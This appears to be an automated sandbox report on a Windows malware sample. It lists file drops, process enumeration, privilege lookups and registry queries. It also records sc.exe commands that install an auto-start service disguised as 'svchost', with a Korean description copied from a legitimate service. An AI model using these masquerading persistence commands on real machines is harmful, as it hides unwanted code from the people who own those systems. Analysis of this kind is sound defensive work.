NtCreateFile Nov. 2, 2021, 11:01 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000016c filepath: c:\744f5a4e12bd43a5e6e09de85f\$shtdwn$.req desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\c:\744f5a4e12bd43a5e6e09de85f\$shtdwn$.req create_options: 4192 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 3 (FILE_SHARE_READ\|FILE_SHARE_WRITE)	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap\Uninstall WinPcap 4.1.3.lnk

Creates a suspicious process (6 events)

cmdline	"C:\Windows\system32\sc.exe" start svchost
cmdline	C:\Windows\System32\sc.exe create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost
cmdline	C:\Windows\System32\sc.exe start svchost
cmdline	"C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost
cmdline	"C:\Windows\system32\sc.exe" description svchost "이 컴퓨터와 인터넷 또는 원격 네트워크 간의 전화 접속 연결과 가상 사설망(VPN) 연결을 관리합니다. 이 서비스를 사용하지 않으면 이 서비스에 명시적으로 종속된 모든 서비스가 시작되지 않습니다."
cmdline	C:\Windows\System32\sc.exe description svchost "이 컴퓨터와 인터넷 또는 원격 네트워크 간의 전화 접속 연결과 가상 사설망(VPN) 연결을 관리합니다. 이 서비스를 사용하지 않으면 이 서비스에 명시적으로 종속된 모든 서비스가 시작되지 않습니다."

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Drops an executable to the user AppData folder (9 events)

file	C:\Users\test22\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\wixstdba.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Analysis.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Base.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Packets.dll
file	C:\Users\test22\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.be\vcredist_x64.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Core.Extensions.dll

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (32 events)

Time & API	Arguments	Status	Return
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: smss.exe process_identifier: 224	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: csrss.exe process_identifier: 300	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: lsass.exe process_identifier: 452	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: lsm.exe process_identifier: 460	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 580	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 656	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 728	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 836	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: audiodg.exe process_identifier: 916	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 988	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 304	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 1044	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 1340	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: srvany.exe process_identifier: 1380	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: KMService.exe process_identifier: 1452	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: conhost.exe process_identifier: 1468	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: sppsvc.exe process_identifier: 1716	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 1804	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: dwm.exe process_identifier: 2028	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: explorer.exe process_identifier: 1156	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: SearchIndexer.exe process_identifier: 772	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: SearchFilterHost.exe process_identifier: 1492	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: pw.exe process_identifier: 2516	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: taskhost.exe process_identifier: 2552	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: SearchProtocolHost.exe process_identifier: 2696	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: vcredist_2010.exe process_identifier: 2780	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: taskhost.exe process_identifier: 2152	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: WmiPrvSE.exe process_identifier: 2236	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: WinPcap_4_1_3.exe process_identifier: 2572	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: vcredist_2010_x64.exe process_identifier: 2936	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: vcredist_2013_x64.exe process_identifier: 1308	1	1
Process32NextW Nov. 2, 2021, 11:01 a.m.	snapshot_handle: 0x00000120 process_name: Setup.exe process_identifier: 1604	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 2, 2021, 11:01 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (34 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW Nov. 2, 2021, 11:01 a.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1

Expresses interest in specific running processes (2 events)

process	setup.exe
process	vcredist_2010_x64.exe

Queries for potentially installed applications (50 out of 83 events)

Time & API	Arguments	Status	Return
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000001e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: AddressBook base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: Connection Manager base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: DirectDrawEx base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: EditPlus base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: ENTERPRISE base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: Fontcore base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: Google Chrome base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: IE40 base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: IE4Data base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: IE5BAKEX base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: IEData base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: MobileOptionPack base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: SchedulingAgent base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: WIC base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x000001e4 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:02 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ea14036a-96ff-4c95-a988-78d36f0ccffa} base_handle: 0x80000002 key_handle: 0x00000430 options: 0 access: 0x00020006 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ea14036a-96ff-4c95-a988-78d36f0ccffa}	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ea14036a-96ff-4c95-a988-78d36f0ccffa} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ea14036a-96ff-4c95-a988-78d36f0ccffa}		2
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ea14036a-96ff-4c95-a988-78d36f0ccffa}.RebootRequired base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ea14036a-96ff-4c95-a988-78d36f0ccffa}.RebootRequired		2
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ea14036a-96ff-4c95-a988-78d36f0ccffa} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ea14036a-96ff-4c95-a988-78d36f0ccffa}		2
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000214 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: AddressBook base_handle: 0x00000214 key_handle: 0x00000218 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: Connection Manager base_handle: 0x00000214 key_handle: 0x00000218 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: DirectDrawEx base_handle: 0x00000214 key_handle: 0x00000218 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: EditPlus base_handle: 0x00000214 key_handle: 0x00000218 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: ENTERPRISE base_handle: 0x00000214 key_handle: 0x00000218 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
RegOpenKeyExW Nov. 2, 2021, 11:01 a.m.	regkey_r: Fontcore base_handle: 0x00000214 key_handle: 0x00000218 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0

Uses Windows utilities for basic Windows functionality (7 events)

cmdline	"C:\Windows\system32\sc.exe" start svchost
